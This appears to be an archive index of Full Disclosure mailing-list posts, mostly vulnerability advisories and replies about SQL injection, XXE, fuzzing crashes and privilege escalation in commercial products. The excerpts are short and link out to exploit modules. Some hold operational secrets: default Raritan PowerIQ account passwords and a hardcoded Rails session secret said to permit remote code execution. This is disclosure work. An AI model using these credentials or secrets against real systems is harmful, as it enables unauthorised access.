Re: [FD] libquicktime multiple vulnerabilities

> On Jun 7, 2017, at 4:43 AM, qflb.wu wrote: > > libquicktime multiple vulnerabilities > > > > Author : qflb.wu > === > > > Introduction: > = > The libquicktime package contains the libquicktime library, various plugins

Re: [FD] [oss-security] Dolibarr ERP & CRM - Multiple Issues

> On May 17, 2017, at 3:08 PM, Stefan Pietsch > wrote: > > On 10.05.2017 10:28, FOXMOLE Advisories wrote: >> === FOXMOLE - Security Advisory 2017-02-23 === >> >> Dolibarr ERP & CRM - Multiple Issues >> ~ >> >> Affected Versions

[FD] Multiple crashes in OpenEXR

Attached is a zip file of EXR images that cause segmentation faults in the OpenEXR library (tested against 2.2.0). http://www.openexr.com/downloads.html These were reported to ehan...@ilm.com on January 12, 2017, but no updates

Re: [FD] Numerous FreeTDS crashes fixed on master

, feel free to ask off list. > On May 9, 2017, at 9:34 AM, Brandon Perry <bperry.volat...@gmail.com> wrote: > > t signature.asc Description: Message signed with OpenPGP ___ Sent through the Full Disclosure mailing list https://nmap

Re: [FD] Numerous FreeTDS crashes fixed on master

lt;http://eriqande.github.io/2014/12/19/setting-up-rodbc.html> Also, obviously the tsql binary if used to connect to an untrusted MSSQL/Sybase server. > On May 9, 2017, at 9:34 AM, Brandon Perry <bperry.volat...@gmail.com> wrote: > > Attached is a zip file of reported TDS streams

[FD] Numerous FreeTDS crashes fixed on master

Attached is a zip file of reported TDS streams that cause segmentation faults in the FreeTDS library. The ‘tsql’ binary was used for the fuzzing, so these most likely only affect client-side functionality. These have been resolved on master and the 1.0 branch. Also included in the zip file is

Re: [FD] Joomla com_tag v1.7.6 - (tag) SQL Injection Vulnerability

> On May 3, 2017, at 6:07 AM, Vulnerability Lab > wrote: > > Document Title: > === > Joomla com_tag v1.7.6 - (tag) SQL Injection Vulnerability > > > References (Source): > >

Re: [FD] Multiple SQL injection vulnerabilities in dotCMS (8x CVE)

> On Oct 31, 2016, at 2:41 PM, Elar Lang wrote: > > Title: Multiple SQL injection vulnerabilities in dotCMS (8x CVE) > Credit: Elar Lang / https://security.elarlang.eu > Vendor/Product: dotCMS (http://dotcms.com/) > Vulnerability: SQL injection > Vulnerable version: before

[FD] Segmentation fault in Oracle Outside In File ID 8.5.3

This is a segfault in the Oracle Outside In File ID library version 8.5.3. http://www.oracle.com/technetwork/middleware/content-management/downloads/oit-dl-otn-097435.html ==22240== Memcheck, a memory error detector ==22240== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.

Re: [FD] Zabbix 2.2.x, 3.0.x SQL Injection Vulnerability

> On Aug 12, 2016, at 10:31 PM, 1...@hushmail.com wrote: > > Which version of Zabbix? 3.0.3? > Right, it’s the same vuln, just in different places. It was fixed in 3.0.4. > -1N3 > > On 8/12/2016 at 7:22 PM, "Brandon Perry" <bperry.volat...@gmail.com> wrot

[FD] PrinceXML PHP wrapper command injection

While grabbing a copy PrinceXML, I noticed the company also offered some wrapper classes in various languages for using prince in server applications (web applications). http://www.princexml.com/download/wrappers/ Taking a quick look at the PHP

Re: [FD] [oss-security] libical 0.47 SEGV on unknown address

lient-bug-bounty/> (Security bug must be a remote exploit, the cause of a privilege escalation, or an information leak) > On Jun 25, 2016, at 10:41 AM, Brandon Perry <bperry.volat...@gmail.com> wrote: > >> >> On Jun 25, 2016, at 10:34 AM, Alan Coop

Re: [FD] [oss-security] libical 0.47 SEGV on unknown address

> On Jun 25, 2016, at 10:34 AM, Alan Coopersmith <alan.coopersm...@oracle.com> > wrote: > > On 06/24/16 06:54 AM, Brandon Perry wrote: >> I am posting this to Full Disclosure/OSS instead of reporting it because I >> have >> opened a handful of libical bugs

[FD] libical 0.47 SEGV on unknown address

Hello lists Attached is a test case for causing a crash in libical 0.47 (shipped with Thunderbird) and this was also tested against 1.0 (various versions shipped with various email clients). = ==24662==ERROR: AddressSanitizer:

[FD] Raritan PowerIQ default credentials

Hello list, Raritan PowerIQ ships with a few default accounts and passwords/hashes. For the web interface, there are technically 3 default users. web_api:sl33p30F00dumass! epiq_api:raritan admin:raritan You can technically authenticate with the epiq_api user on the web interface and the

Re: [FD] Symantec Endpoint Protection

Do you have example requests for the SQL injections? On Jul 31, 2015, at 7:40 AM, Markus Wulftange markus.wulfta...@code-white.com wrote: Code White found several vulnerabilities in Symantec Endpoint Protection (SEP), affecting versions 12.1 prior to 12.1 RU6 MP1. SEP Manager (SEPM):

[FD] Web-Dorado ECommerce-WD for Joomla plugin multiple unauthenticated SQL injections

Version 1.2.5 of the ECommerce-WD plugin for Joomla! has multiple unauthenticated SQL injections available via the advanced search functionality. http://extensions.joomla.org/extension/ecommerce-wd The vulnerable parameters are search_category_id, sort_order, and filter_manufacturer_ids within

[FD] Raritan PowerIQ known session secret

Raritan PowerIQ versions 4.1, 4.2, and 4.3 ship with a Rails 2 web interface with a hardcoded session secret of 8e238c9702412d475a4c44b7726a0537. This can be used to achieve unauthenticated remote code execution as the nginx user on vulnerable systems. msf exploit(rails_secret_deserialization)

[FD] Multiple SQL injections in core Orion service affecting many Solarwinds products (CVE-2014-9566)

I found a couple SQL injection vulnerabilities in the core Orion service used in most of the Solarwinds products (SAM, IPAM, NPM, NCM, etc…). This service provides a consistent configuration and authentication layer across the products. To be exact, the vulnerable applications and versions are:

[FD] BMC TrackIt! Unauthenticated Arbitrary Local System User Password Change

BMC TrackIt! 11.3 Unauthenticated Local User Password Change Trial available here: http://www.trackit.com A Metasploit pull request has been made here: https://github.com/rapid7/metasploit-framework/pull/4359 BMC TrackIt! 11.3 when installed with TrackItWeb! allows an unauthenticated user to

[FD] device42 DCIM authenticated remote root via appliance manager

Remote Authenticated Root in Device42 DCIM Appliance Manager v5.10 and v6.0 http://www.device42.com/download/ Device42 ships virtual appliances ready for production use as a trial (essentially dictated by the license provided). The Appliance Manager listens on HTTP (no SSL) on port 4242

[FD] Mulesoft ESB Authenticated Privilege Escalation

Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation → Remote Code Execution Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to create an administrator user due to a lack of permissions check in the handler/securityService.rpc endpoint. The following HTTP request

Re: [FD] XXE Injection in HP Release Control

It's not an 0day, I dropped this in may. On Mon, Aug 4, 2014 at 9:39 AM, Douglas Held r...@douglasheld.net wrote: Hello MustLive, Did you disclose this to HP? You didn't mention whether this is 0-day or disclosed (I think you usually publish your disclosure timeline) Thanks Doug Date:

Re: [FD] Beginner's error: import function of Windows Mail executes rogue program C:\Program.exe with credentials of other account

So, I am very curious how you are finding these? Have you automated this or is it manual hand work? On Wed, Jul 23, 2014 at 2:50 PM, Stefan Kanthak stefan.kant...@nexgo.de wrote: Hi @ll, the import function of Windows Mail executes a rogue program C:\Program.exe with the credentials of

[FD] Dell Scrutinizer 11.01 multiple vulnerabilities

Hello! The below gists detail at a high level[1] many SQL injection vulnerabilities as well as a privilege escalation vulnerability and corresponding Metasploit modules[2]. [1] https://gist.github.com/brandonprry/36b4b8df1cde279a9305 [2] https://gist.github.com/brandonprry/76741d9a0d4f518fe297

Re: [FD] Should it be better ...

Thank you for bringing this up. When posting my information, I was actually assuming a brief description with links was preferred if you were so inclined to read after a summary. I, for one, didn't grow up on those types of lists and had never even looked at bugtraq from that early on. I also

[FD] InvGate Service Desk post-auth SQL injection as non-privileged user

Hi, https://gist.github.com/brandonprry/fc4d396ca7503d49a0f5 Detailed in the above gist is a slew of SQL injections available to an authenticated but non-privileged user in the latest available version (from their website) of InvGate. -- http://volatile-minds.blogspot.com -- blog

[FD] Root command injection in ext-pack name for Virtualbox because of GKSu

A while back I noticed some funny behavior that I thought was in virtual box at first, but it turn sour the reason I can do this is because of GKSu. I felt like the ramifications were fairly large, and contacting the (supposed?) maintainer of GKSu didn't work.

[FD] Scrumworks Pro authenticated arbitrary password reset

The latest available version of Scrumworks Pro does not perform proper authorization checks when users attempt to change passwords via the Java Web Start client. If you capture the request the web start client makes when changing the 'administrator' user's password, and substitute the JSESSIONID

Re: [FD] What do you think of Trollc?

, Brandon Perry bperry.volat...@gmail.com wrote: Not even sure when the last vulnerability that caused any fluctuation in the stock markets was. +!. I'm not sure it ever hurt Sony, and they've had over 40 documented problems [0, 1, 2, et al]. Some of them were very serious from a data security

Re: [FD] What do you think of Trollc?

Not even sure when the last vulnerability that caused any fluctuation in the stock markets was. On Tue, May 27, 2014 at 1:49 PM, Philip Cheong isc...@gmail.com wrote: From https://www.startjoin.com/trollc *Right now if you're a software exploit developer and you want to monetize your craft

Re: [FD] [KIS-2014-06] Dotclear = 2.6.2 (Media Manager) Unrestricted File Upload Vulnerability

Hi, These are cool. Here is a Metasploit module for the file upload. You seem to need the ability to publish as well the the ability to manage your own media. Feel free to edit as you would like and make a pull request! https://gist.github.com/brandonprry/efc0765c342a44a0dedb On Wed, May 21,

[FD] Moar F5 fun in iControl API

Hi, Linked below is an advisory regarding remote command execution (as root, possibly) vulnerabilities within the iControl API: http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html An example request that will set the hostname to 'root.example.com': ?xml version=1.0

Re: [FD] F5 BIG-IQ authed arbitrary user password change

Nm on ExploitHub. Here is the module: https://gist.github.com/brandonprry/2e73acd63094fa2a4f63 On Thu, May 1, 2014 at 5:10 PM, Brandon Perry bperry.volat...@gmail.comwrote: Hi, Detailed at this blog post (with pics!) is a vulnerability within F5 BIG-IQ 4.1.0.2013.0. http://volatile

Re: [FD] Beginners error: iTunes for Windows runs rogue program C:\Program.exe when opening associated files

Stupid people also share their C: drive on networks. On 04/30/2014 05:17 PM, Alton Blom wrote: Hi Mike, It's probalby better seen as a way of keeping persistence on a machine than a full-blown exploit. Alton(ius) altonblom.com @altonius_au On Thu, May 1, 2014 at 8:05 AM, Mike Cramer

[FD] F5 BIG-IQ authed arbitrary user password change

Hi, Detailed at this blog post (with pics!) is a vulnerability within F5 BIG-IQ 4.1.0.2013.0. http://volatile-minds.blogspot.com/2014/05/f5-big-iq-v41020130-authenticated.html A module for this will be uploaded to ExploitHub this evening that will change the root users password and log in over

Re: [FD] AOL confirms compromise

Best practice is PCI compliance. Duh. On Tue, Apr 29, 2014 at 5:21 PM, Jeffrey Walton noloa...@gmail.com wrote: On Tue, Apr 29, 2014 at 11:30 AM, Daniel Hadfield d...@pingsweep.co.uk wrote: http://blog.aol.com/2014/04/28/aol-security-update/ Ouch... Have any details of the encryption

[FD] Xerox DocuShare authenticated SQL injection

Hi, detailed in the linked gist is a SQL injection available to authenticated read-only users within Xerox DocuShare: https://gist.github.com/brandonprry/10745681 -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website

Re: [FD] Legality of Open Source Tools

If I recall correctly, version 1 of metasploit actually had exploits for *live* sites (a bank) and things, so that is obviously an issue. I don't even think you will find a copy of the first version of metasploit (does HD have one locked up somewhere, who knows). Currently, metasploit is a

[FD] EMC CTA v10.0 unauthenticated XXE with root perms

Hi, The linked gist below details an unauthenticated XXE vulnerability that allows an attacker to read /etc/shadow within EMC CTA v10.0. https://gist.github.com/brandonprry/9895721 -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website